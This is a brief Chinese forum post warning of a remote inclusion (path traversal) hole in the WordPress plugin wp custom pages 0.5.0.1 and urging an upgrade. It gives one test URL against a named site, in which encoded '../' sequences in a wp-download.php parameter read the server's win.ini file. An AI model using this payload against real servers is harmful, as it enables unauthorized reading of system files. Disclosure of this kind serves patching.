WordPress自定义页面插件远程包含漏洞
<DIV><P>Worepress的一个自定义页面的插件存在远程包含漏洞。</P>
<P>插件名称:wp custom pages 版本:0.5.0.1</P>
<P>有安装的请赶快升级新版本哦。发个测试。如下:</P>
<P>http://www.heimian.com/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini </P></DIV>
页:
[1]